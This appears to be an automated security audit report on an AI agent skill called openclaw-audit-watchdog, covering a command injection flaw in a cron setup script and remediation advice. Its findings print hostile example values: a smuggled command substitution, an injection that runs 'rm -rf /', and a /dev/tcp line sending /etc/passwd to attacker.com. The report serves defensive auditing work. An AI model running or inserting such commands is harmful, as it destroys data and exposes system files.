Security Audit

openclaw-audit-watchdog

github.com/openclaw/skills

AI SkillCommit 13146e6a3d46

CAUTION

Scanned about 1 month ago

Critical

Immediate action required

High

Priority fixes suggested

Medium

Best practices review

Low

Acknowledged / Tracked

Trust Assessment

openclaw-audit-watchdog received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.

SkillShield's automated analysis identified 4 findings: 1 critical, 1 high, 0 medium, and 1 low severity. Key findings include Command Injection via unsanitized environment variables in cron payload, Data Exfiltration via Command Injection in cron payload, Self-updating script introduces supply chain risk.

The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 53/100, indicating areas for improvement.

Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.

Layer Breakdown

Manifest Analysis

100%

Static Code Analysis

100%

Dependency Graph

100%

LLM Behavioral Safety

53%

Behavioral Risk Signals

Network Access

3 findings

Filesystem Write

2 findings

Shell Execution

4 findings

Dynamic Code

3 findings

Excessive Permissions

1 finding

Security Findings4

Severity	Finding	Layer	Location
CRITICAL	Command Injection via unsanitized environment variables in cron payload The `scripts/setup_cron.mjs` script constructs a shell command string that is used as the `openclaw` agent's cron job payload. The `oneline` function (defined at line 60), used to sanitize values like `PROMPTSEC_HOST_LABEL` and `PROMPTSEC_INSTALL_DIR`, only escapes double quotes and removes newlines. It does not escape other critical shell metacharacters (e.g., `$`, `(`, `)`, `;`, `\|`, `&`, `\` when not part of `\"`). An attacker can set these environment variables (or provide malicious input during interactive setup) to inject arbitrary shell commands into the cron job's execution context. For example, setting `PROMPTSEC_HOST_LABEL='$(id > /tmp/exfil)'` would result in `PROMPTSEC_HOST_LABEL="$(id > /tmp/exfil)"` in the payload, executing `id > /tmp/exfil` when the cron job runs. Similarly, `PROMPTSEC_INSTALL_DIR='foo"; rm -rf /; echo "'` would break the `cd` command's quoting and execute `rm -rf /`. Implement robust shell escaping for all user-controlled or environment-variable-derived values that are embedded into shell command strings. The `oneline` function should be replaced or augmented with a function that escapes all shell metacharacters (e.g., using a library function for shell quoting or a comprehensive custom implementation). Ensure that both `hostLabel` and `installDir` are fully shell-escaped before being included in the `agentMessage` payload.	LLM	scripts/setup_cron.mjs:100
HIGH	Data Exfiltration via Command Injection in cron payload The command injection vulnerability in `scripts/setup_cron.mjs` (SS-CMD-001) allows an attacker to execute arbitrary shell commands within the `openclaw` agent's cron job. This capability can be directly leveraged to exfiltrate sensitive data, such as environment variables, configuration files (e.g., `/etc/passwd`), or system information, to an external attacker-controlled server. For example, an injected command like `$(cat /etc/passwd > /dev/tcp/attacker.com/80)` could send system password data. Address the underlying command injection vulnerability (SS-CMD-001) by implementing proper shell escaping for all user-controlled inputs embedded in executed commands. This will prevent the execution of arbitrary commands, thereby mitigating the data exfiltration risk.	LLM	scripts/setup_cron.mjs:100
LOW	Self-updating script introduces supply chain risk The `scripts/runner.sh` script includes logic to perform a `git pull --ff-only` from its repository if the `PROMPTSEC_GIT_PULL` environment variable is set to `1`. While `--ff-only` is a safer merge strategy than a full merge, any automatic update mechanism introduces a supply chain risk. If the Git repository hosting the skill, or the network path to it, were compromised, an attacker could inject malicious code into the skill, which would then be automatically downloaded and executed on the agent. Consider implementing more robust update verification mechanisms, such as cryptographic signing of updates, or requiring manual approval for updates. If automatic updates are essential, ensure the Git repository is highly secured and consider using signed commits/tags to verify integrity and authenticity of updates.	LLM	scripts/runner.sh:18
INFO	Extensive use of powerful system binaries The skill's functionality relies on the execution of several powerful system binaries, including `bash`, `node`, `openclaw`, `sendmail`, and `git`. While the `skill.json` manifest explicitly lists `bash` and `curl` as required, the scripts also implicitly rely on `node`, `sendmail`, and `git`. Their collective capabilities grant the skill broad system access. Any vulnerability in the skill's logic or input handling could be amplified by the extensive permissions associated with these underlying tools, potentially leading to significant security impacts. Ensure that all interactions with these powerful binaries are implemented with the principle of least privilege. Thoroughly review all command constructions and input sanitization to prevent misuse. The `openclaw` tool itself should be designed with strong security boundaries and input validation to minimize its attack surface.	LLM	skill.json:40

Scan History

Embed Code

[![SkillShield](https://skillshield.io/api/v1/badge/bf7ea349a8cd6ad6.svg)](https://skillshield.io/report/bf7ea349a8cd6ad6)